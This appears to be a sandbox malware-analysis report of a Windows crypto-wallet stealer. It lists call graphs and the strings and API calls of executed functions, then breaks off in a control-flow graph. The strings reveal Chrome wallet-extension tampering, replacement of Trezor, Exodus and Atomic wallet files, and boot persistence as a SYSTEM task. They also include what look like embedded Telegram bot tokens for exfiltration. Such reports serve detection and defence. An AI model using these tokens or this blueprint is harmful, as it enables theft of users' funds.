44399->43168 44405 7ff72ca06f84 _Getctype 47 API calls 44404->44405 44406 7ff72ca0182d 44405->44406 44409 7ff72ca09788 44406->44409 44410 7ff72ca0979d 44409->44410 44411 7ff72c9ee0bd 44409->44411 44410->44411 44413 7ff72ca1348c 47 API calls 3 library calls 44410->44413 44411->44365 44411->44366 44413->44411 44414->44372 44415->44377 44416->44379 44418->44373 44420->44392 44422 7ff72c9d002a 44421->44422 44423 7ff72c9cffda 44421->44423 44422->43346 44424 7ff72c9cfdd0 78 API calls 44423->44424 44425 7ff72c9d0014 44424->44425 44426 7ff72c9f8fe0 76 API calls 44425->44426 44426->44422 44483 7ff72c9ee3ac 44427->44483 44429 7ff72c9d87f6 _Receive_impl 44429->43346 44431 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 44432 7ff72c9d881b 44431->44432 44432->43346 44434 7ff72c9d7b60 44433->44434 44441 7ff72c9d78ed 44433->44441 44506 7ff72c9d62a0 50 API calls 2 library calls 44434->44506 44435 7ff72c9d7923 44439 7ff72c9f2a38 std::_Facet_Register 50 API calls 44435->44439 44437 7ff72c9d7b5b 44505 7ff72c9b2370 50 API calls 3 library calls 44437->44505 44438 7ff72c9d7b66 44442 7ff72c9d795d 44439->44442 44441->44435 44441->44437 44441->44442 44443 7ff72c9d7970 44441->44443 44444 7ff72c9d7999 44441->44444 44442->44438 44490 7ff72c9d8ff0 44442->44490 44443->44435 44443->44437 44446 7ff72c9f2a38 std::_Facet_Register 50 API calls 44444->44446 44446->44442 44462->43346 44463->43346 44464->43346 44465->43346 44466->43346 44476->43298 44481->43336 44482->43286 44484 7ff72c9ee3b6 FindClose 44483->44484 44485 7ff72c9d87c2 44483->44485 44484->44485 44486 7ff72c9ee3c5 44484->44486 44485->44429 44485->44431 44489 7ff72ca01774 47 API calls __std_fs_directory_iterator_open 44486->44489 44491 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44490->44491 44505->44434 44506->44438 44524->43365 44526 7ff72c9d8b22 44525->44526 44536 7ff72c9d8bae 44525->44536 44527 7ff72c9f2a38 std::_Facet_Register 50 API calls 44526->44527 44528 7ff72c9d8b3a 44527->44528 44529 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44528->44529 44530 7ff72c9d8b57 44529->44530 44531 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44530->44531 44532 7ff72c9d8b65 44531->44532 44533 7ff72c9d8af0 50 API calls 44532->44533 44534 7ff72c9d8b9c 44533->44534 44535 7ff72c9d8af0 50 API calls 44534->44535 44535->44536 44536->43370 44538 7ff72c9b56d5 44537->44538 44546 7ff72c9b56b9 _Receive_impl 44537->44546 44543 7ff72c9b570f 44538->44543 44630 7ff72c9d3b40 50 API calls 6 library calls 44538->44630 44540 7ff72c9f2770 codecvt 8 API calls 44541 7ff72c9b58c2 44540->44541 44541->43415 44542 7ff72c9cefc0 50 API calls 44544 7ff72c9b57a9 44542->44544 44543->44542 44545 7ff72c9b5856 44544->44545 44550 7ff72c9cefc0 50 API calls 44544->44550 44625 7ff72c9ee314 CreateDirectoryW 44544->44625 44545->44546 44547 7ff72c9b58db 44545->44547 44546->44540 44550->44544 44552->43393 44554 7ff72c9d05f6 44553->44554 44555 7ff72c9d06c8 44553->44555 44560 7ff72c9d0609 ctype 44554->44560 44631 7ff72c9d4c40 50 API calls 6 library calls 44554->44631 44632 7ff72c9d1520 50 API calls 44555->44632 44559 7ff72c9d06b7 44559->43444 44560->43444 44561->43444 44563 7ff72c9d0717 44562->44563 44567 7ff72c9d06ed ctype 44562->44567 44564 7ff72c9d0819 44563->44564 44565 7ff72c9d072a 44563->44565 44633 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 44564->44633 44571 7ff72c9d0771 44565->44571 44572 7ff72c9d07ad 44565->44572 44574 7ff72c9d077e 44565->44574 44578 7ff72c9d0763 ctype 44565->44578 44567->43444 44568 7ff72c9d081e 44634 7ff72c9b2370 50 API calls 3 library calls 44568->44634 44569 7ff72c9f2a38 std::_Facet_Register 50 API calls 44569->44578 44571->44568 44571->44574 44573 7ff72c9f2a38 std::_Facet_Register 50 API calls 44572->44573 44573->44578 44574->44569 44575 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 44576 7ff72c9d082a 44575->44576 44577 7ff72c9d07fb _Receive_impl 44577->43444 44578->44575 44578->44577 44579->43444 44581 7ff72c9ee770 __std_fs_open_handle 2 API calls 44580->44581 44582 7ff72c9ee80d 44581->44582 44583 7ff72c9ee813 44582->44583 44585 7ff72c9ee9bb 44582->44585 44587 7ff72c9ee770 __std_fs_open_handle 2 API calls 44582->44587 44584 7ff72c9ee816 SetFileInformationByHandle 44583->44584 44592 7ff72c9ee83c 44583->44592 44586 7ff72c9ee8b8 GetLastError 44584->44586 44584->44592 44637 7ff72ca01774 47 API calls __std_fs_directory_iterator_open 44585->44637 44588 7ff72c9ee8c5 44586->44588 44587->44583 44588->44592 44635 7ff72c9ee03c SetFileInformationByHandle GetLastError SetFileInformationByHandle GetLastError 44588->44635 44589 7ff72c9ee892 44594 7ff72c9f2770 codecvt 8 API calls 44589->44594 44590 7ff72c9ee849 44593 7ff72c9ee884 CloseHandle 44590->44593 44592->44589 44592->44590 44592->44593 44593->44585 44593->44589 44597 7ff72c9ee8a2 44594->44597 44596 7ff72c9ee8e3 44596->44592 44599 7ff72c9ee8f5 GetFileInformationByHandleEx 44596->44599 44597->43444 44616->43418 44617->43450 44626 7ff72c9ee339 GetLastError 44625->44626 44629 7ff72c9ee32d 44625->44629 44626->44629 44629->44544 44630->44543 44631->44559 44634->44578 44635->44596 44639->43475 45037 7ff72c9ba870 45036->45037 45038 7ff72c9ee0b4 __std_fs_code_page 48 API calls 45037->45038 45039 7ff72c9ba888 45038->45039 45040 7ff72c9b3ab0 52 API calls 45039->45040 45041 7ff72c9ba8ad 45040->45041 45042 7ff72c9bac76 45041->45042 45043 7ff72c9ba8db 45041->45043 45096 7ff72c9b4d50 51 API calls _com_raise_error 45042->45096 45045 7ff72c9bac89 45043->45045 45063 7ff72c9ba918 _Receive_impl 45043->45063 45047 7ff72c9bac8f 45048 7ff72c9b55a0 66 API calls 45048->45063 45050 7ff72c9bac9f 45051 7ff72c9babb5 45054 7ff72c9b4f80 52 API calls 45054->45063 45056 7ff72c9baca5 45057 7ff72c9bacab 45060 7ff72c9d4160 50 API calls 45060->45063 45063->45047 45063->45048 45063->45050 45063->45051 45063->45054 45063->45056 45063->45057 45063->45060 45078 7ff72c9b3f60 45063->45078 45095 7ff72c9d7d80 50 API calls 4 library calls 45063->45095 45095->45063 45412->44203

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00007FF72C9C83F0 Relevance: 234.2, APIs: 30, Strings: 102, Instructions: 3173networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$ErrorLastWindow$CleanupConsoleCreateEnumFileModuleNameProcessesShowSnapshotStartupToolhelp32gethostname
                                                                                                                                                                  • String ID: terminated successfully.$*L\(&.$128CF4C4A59C494144DAA119829B936CB9188E7B9DEFDBD4C0493780A8F822BE$13374559388926377$13374561731521706$13374995715847847$13375049800588985$13375110241046665$13375110296496201$13375110310591214$13375110321620290$13375110331747787$13375110344191823$13375110354575865$13375110364515390$18750852BBA140FCF329F0B2F98ED961304CD00CFEE1A5FF44762B97F2CE9E2F$1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$23.12.21$2CDA9B33DF3854077ED63B9E912DD676B1892A6CDD18DC59790C40799E92D71B$6442787215$6C086D45706F3CDD6696F63808255BDDE719EA09BA60CBC98CDFEB55C8E94AE2$7340678156$7427009775$7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ$7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o$7867603719:AAEHk7Xd_OIqLVzZCPZMe4dTduUoZLQ8y2Y$805CF202E4DF8532D12BE509DE6794904E1C5D1F9FD783FD1507ADE27DEEE8AA$928279468E812A7C237289C39C5EA79668D93AE33F533F0C2198516C379764B7$</b>$</code>$<all_urls>$<b>Device Name:</b> $<b>IP Address:</b> $<b>Location:</b> $<b>Wallets:</b><code>$AF7CBA694AB611FF172D667CA5504FEBFB024ABC1637F2C63B8D72D67BBA3F5A$All users: $C:\Program Files\Google\Chrome\Extensions$C:\Program Files\Google\Chrome\Extensions\aholpfdialjgjfhomihkjbmgjidlcdno$C:\Program Files\Google\Chrome\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa$C:\Program Files\Google\Chrome\Extensions\efbglgofoippbgcjepnhiblaibcnclgk$C:\Program Files\Google\Chrome\Extensions\egjidjbpglichdcondbcbdnbeeppgdph$C:\Program Files\Google\Chrome\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec$C:\Program Files\Google\Chrome\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad$C:\Program Files\Google\Chrome\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo$C:\Program Files\Google\Chrome\Extensions\mcohilncbfahbmgdjkbpemcciiolgcge$C:\Program Files\Google\Chrome\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn$C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph\graph.exe$C:\Users\$CAC5B4D0F32AA7D73E8AF05E83A188D2ECBA2B6186D06E54306BC2427BBCD68C$D304D4787A15629A04F596502ED8CF8C6031BF683EB7BCFDB1819D5F02C9667B$D:\@dev\Extensions\Ronin (Extension)$Directory and all contents deleted successfully: $Directory and its contents removed.$Directory don't exist $E0DC88925F64449E216468A174ED51BFEE4E6510DF40B0D2B576B9F4DFFA468D$Extensions Installed$Extraction complete.$Extraction failed.$Failed to delete the directory.$Failed to initialize Winsock.$Failed to open file: $Failed to open output ZIP file: $Failed to terminate $Graph$No wallet installed previously...$Nothing found$Process $Processing: $There are no users. Exit$ZIP Local File Header signature not found in file.$ZIP file extracted successfully to $\AppData\Local\Google\Chrome\User Data$action.onClicked$activeTab$active_permissions$aholpfdialjgjfhomihkjbmgjidlcdno$api$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$exists$fnjhmkhhmkbjkkabndcnnogagogbneec$found chrome profiles$graph.exe$hardware wallet replace finished$hash$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn$remove_all$tabs$user =
                                                                                                                                                                  • API String ID: 955434303-347371858
                                                                                                                                                                  • Opcode ID: 59db4ebdd99e30fb6ab73c31ec0bbca1e15ee0fee2104dd16a692ed7901d931a
                                                                                                                                                                  • Instruction ID: 4f9c03259b6944b3f85e7f524b251793a483601c474a345d1ad9b976b89b6684
                                                                                                                                                                  • Opcode Fuzzy Hash: 59db4ebdd99e30fb6ab73c31ec0bbca1e15ee0fee2104dd16a692ed7901d931a
                                                                                                                                                                  • Instruction Fuzzy Hash: 1973A622914BC295E730EF34DC553EC6365FBA93A8F805232D68C4AA9ADF78D784C750
                                                                                                                                                                  Function 00007FF72C9BCA90 Relevance: 106.5, APIs: 36, Strings: 24, Instructions: 1459COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_taskEnvironmentFileFindFirstVariable
                                                                                                                                                                  • String ID: Directory: $ $ (User: $ (User: None)$#$*L\(&.$.exe$.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Exodus$Found directories:$Trazor Suite.exe$Trezor$Unzipped Hardware Wallet: $Wallet: $\resources\app\assets\index.js$\resources\app\assets\javascript.js$\resources\app\js\index.js$atomic.exe$remove$remove_all
                                                                                                                                                                  • API String ID: 1414602396-1188282579
                                                                                                                                                                  • Opcode ID: 5ba4532989bbdce573cf3cd4f012c2a2fefbf00a746ed2066879ac80b5424339
                                                                                                                                                                  • Instruction ID: 46b7d2ebdbcae1ba9a84a396573c98215ecbcdc3a0c6bd594892dfda4488a4f9
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ba4532989bbdce573cf3cd4f012c2a2fefbf00a746ed2066879ac80b5424339
                                                                                                                                                                  • Instruction Fuzzy Hash: 1FE26562A1CBC591EA20EB14E8443AEF365FB957A4F905731D6EC02AD9DF7CE084DB10
                                                                                                                                                                  Function 00007FF72C9C5EC0 Relevance: 104.7, APIs: 41, Strings: 18, Instructions: 1483memorycomCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInitStringUninitialize$_invalid_parameter_noinfo_noreturn$AllocConcurrency::cancel_current_taskErrorFreeLast$CreateFileInitializeInstanceModuleName
                                                                                                                                                                  • String ID: *L\(&.$Cannot create action.$Cannot create boot trigger.$Cannot get Root Folder pointer.$Cannot get action collection.$Cannot get trigger collection.$Current process path: $Failed to connect to Task Scheduler.$Failed to create TaskService instance.$Failed to create task definition.$Failed to get process path. Error: $Failed to initialize COM library.$Failed to register task. Error: $Failed to set executable path.$MyBootTask$QueryInterface call failed for IExecAction.$SYSTEM$Task successfully registered to run at boot with admin rights.
                                                                                                                                                                  • API String ID: 1778526238-2270288801
                                                                                                                                                                  • Opcode ID: e7f679fec1e2fe71e2bb3b6d2010b159ced2c01edf8d9922db579376c07f1f16
                                                                                                                                                                  • Instruction ID: 5f90a1cc166c3bda64a5bb972569a09f842fc6af373acae5c5bdc7d7c5148726
                                                                                                                                                                  • Opcode Fuzzy Hash: e7f679fec1e2fe71e2bb3b6d2010b159ced2c01edf8d9922db579376c07f1f16
                                                                                                                                                                  • Instruction Fuzzy Hash: 2DE27972A18BC541EE209B25E8447AEA361FB997B4F504331DAAD03BD9DF7DE180DB10
                                                                                                                                                                  Function 00007FF72C9BE790 Relevance: 96.6, APIs: 27, Strings: 27, Instructions: 2093COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_task$__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                  • String ID: $*L\(&.$C:\Users\$Chrome User Data directory not found.$File parse failed$No extensions found in preferences.$No pinned extensions found or 'pinned_extensions' is not an array.$Warning: Pinned extension is not a string, skipping.$\AppData\Local\Google\Chrome\User Data$\Extensions$\Preferences$\Secure Preferences$developer_mode$directory_iterator::directory_iterator$exists$extensions$file_size$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$name$pinned_extensions$profile$protection$settings$status
                                                                                                                                                                  • API String ID: 1036029176-3331508475
                                                                                                                                                                  • Opcode ID: 7a4e3aa349c9cb98ba2aa56b9b9c7b2504b712bcc718a604fd593dc9a1f2a42e
                                                                                                                                                                  • Instruction ID: b2f8d75f6528cc4c61743aa4de028a677224b534035f7c467adebf197866ed47
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a4e3aa349c9cb98ba2aa56b9b9c7b2504b712bcc718a604fd593dc9a1f2a42e
                                                                                                                                                                  • Instruction Fuzzy Hash: 45238062A1CBC292EA21EB14E8543EEE365FBA5760F845132D6CD07A99DF3CE540CF50
                                                                                                                                                                  Function 00007FF72C9BB600 Relevance: 87.0, APIs: 30, Strings: 19, Instructions: 1276COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                  • String ID: *L\(&.$Directories found:$\assets\js\popup.js$\assets\js\script.js$\js\script.js$\pass.js$\popup.js$\reset.js$\scripts\phrase.js$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
                                                                                                                                                                  • API String ID: 4261731725-2192707863
                                                                                                                                                                  • Opcode ID: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
                                                                                                                                                                  • Instruction ID: 44aaaf61fd29ee783f622c72296d7c892e27b817e5080d584fa7b45fb4f3ba3d
                                                                                                                                                                  • Opcode Fuzzy Hash: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
                                                                                                                                                                  • Instruction Fuzzy Hash: 63D2A122F18F4185FB00EB74E9403AC6361EB657A8F809631DEAC176DADF78E185D790
                                                                                                                                                                  Function 00007FF72C9B6970 Relevance: 65.8, APIs: 25, Strings: 12, Instructions: 1031COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_fs_code_page
                                                                                                                                                                  • String ID: "$*L\(&.$Extracted: $Failed to create output file: $Failed to extract entry: $Failed to get entry info for index: $Failed to initialize ZIP archive: $Failed to open ZIP file: $create_directories$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                  • API String ID: 1686256323-90473547
                                                                                                                                                                  • Opcode ID: 62bf130c463619ec29d0d8d55888deae984f946e5c3730f6e35f799ff8edb434
                                                                                                                                                                  • Instruction ID: ff2b43b6d1eb8d67447f8beb76ed279f9f80a0822c37b2e7f4c8e0b1a07fbacf
                                                                                                                                                                  • Opcode Fuzzy Hash: 62bf130c463619ec29d0d8d55888deae984f946e5c3730f6e35f799ff8edb434
                                                                                                                                                                  • Instruction Fuzzy Hash: 5EA2D772A18B8695EB10EF24D8443ECA761FB657B8F904731DA9C17AD9DF39E180C720
                                                                                                                                                                  Function 00007FF72C9C10F0 Relevance: 62.3, APIs: 25, Strings: 10, Instructions: 1005COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                  • String ID: *L\(&.$.lck$.zip$C:\Program Files\Google\Chrome\Extensions$Download failed$Extensions count: $Profiles count: $create_directories$exists$remove
                                                                                                                                                                  • API String ID: 3708190391-3543784359
                                                                                                                                                                  • Opcode ID: 62b833c19f07cab37c743a9f6876da6e8e553b65f9d6d486f88c02d699a6eb0a
                                                                                                                                                                  • Instruction ID: e06da96c0b69c9bcb2397be4b7ec25fafc029f579e90eb5181054d29d52e0aa1
                                                                                                                                                                  • Opcode Fuzzy Hash: 62b833c19f07cab37c743a9f6876da6e8e553b65f9d6d486f88c02d699a6eb0a
                                                                                                                                                                  • Instruction Fuzzy Hash: ADA2B662A18B8185EB10EF24DC443ADA761FB657B8F904331EA9D17BD9DF78E180CB50
                                                                                                                                                                  Function 00007FF72C9C3CE0 Relevance: 55.1, APIs: 19, Strings: 12, Instructions: 876networkfileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 4249 7ff72c9c3ce0-7ff72c9c3db7 call 7ff72c9f3600 call 7ff72c9d44a0 * 2 InternetOpenA 4256 7ff72c9c3eaf-7ff72c9c3ed8 InternetOpenUrlA 4249->4256 4257 7ff72c9c3dbd-7ff72c9c3e04 call 7ff72c9d1b10 call 7ff72c9d1dc0 call 7ff72c9cf4e0 * 2 4249->4257 4258 7ff72c9c3f24-7ff72c9c3f66 InternetReadFile 4256->4258 4259 7ff72c9c3eda-7ff72c9c3f1e call 7ff72c9d1b10 call 7ff72c9d1dc0 InternetCloseHandle call 7ff72c9cf4e0 * 2 4256->4259 4294 7ff72c9c3e06-7ff72c9c3e1a 4257->4294 4295 7ff72c9c3e3b-7ff72c9c3e46 4257->4295 4262 7ff72c9c3f68 4258->4262 4263 7ff72c9c3fde-7ff72c9c41e2 InternetCloseHandle * 2 call 7ff72ca199f0 call 7ff72c9d1370 call 7ff72c9d1080 call 7ff72c9d0980 call 7ff72c9e8bc0 * 2 call 7ff72c9e1f30 call 7ff72c9e27f0 4258->4263 4259->4258 4267 7ff72c9c3f70-7ff72c9c3f78 4262->4267 4338 7ff72c9c4a52-7ff72c9c4a93 call 7ff72c9d1b10 call 7ff72c9d6670 call 7ff72c9d1dc0 4263->4338 4339 7ff72c9c41e8-7ff72c9c4273 call 7ff72c9e8bc0 call 7ff72c9e74c0 call 7ff72c9e92e0 call 7ff72c9e8c50 call 7ff72c9e8e50 call 7ff72c9e7c70 4263->4339 4267->4263 4271 7ff72c9c3f7a-7ff72c9c3f80 4267->4271 4275 7ff72c9c4c51-7ff72c9c4c56 call 7ff72c9f28a0 4271->4275 4276 7ff72c9c3f86-7ff72c9c3f9c 4271->4276 4290 7ff72c9c4c57-7ff72c9c4c5c call 7ff72c9fcd30 4275->4290 4278 7ff72c9c3fa0-7ff72c9c3fa8 4276->4278 4278->4278 4283 7ff72c9c3faa-7ff72c9c3fdc call 7ff72c9d08c0 InternetReadFile 4278->4283 4283->4263 4283->4267 4307 7ff72c9c4c5d-7ff72c9c4c62 call 7ff72c9fcd30 4290->4307 4299 7ff72c9c3e35-7ff72c9c3e3a call 7ff72c9f2790 4294->4299 4300 7ff72c9c3e1c-7ff72c9c3e2f 4294->4300 4302 7ff72c9c3e48-7ff72c9c3e5c 4295->4302 4303 7ff72c9c3e7c-7ff72c9c3eae call 7ff72c9f2770 4295->4303 4299->4295 4300->4299 4305 7ff72c9c4c3f-7ff72c9c4c44 call 7ff72c9fcd30 4300->4305 4308 7ff72c9c3e77 call 7ff72c9f2790 4302->4308 4309 7ff72c9c3e5e-7ff72c9c3e71 4302->4309 4315 7ff72c9c4c45-7ff72c9c4c4a call 7ff72c9fcd30 4305->4315 4324 7ff72c9c4c63-7ff72c9c4c68 call 7ff72c9fcd30 4307->4324 4308->4303 4309->4308 4309->4315 4326 7ff72c9c4c4b-7ff72c9c4c50 call 7ff72c9fcd30 4315->4326 4334 7ff72c9c4c69-7ff72c9c4c6e call 7ff72c9fcd30 4324->4334 4326->4275 4340 7ff72c9c4c6f-7ff72c9c4c74 call 7ff72c9fcd30 4334->4340 4362 7ff72c9c4a98-7ff72c9c4a9e 4338->4362 4380 7ff72c9c4275-7ff72c9c4280 4339->4380 4381 7ff72c9c42da-7ff72c9c42e3 4339->4381 4349 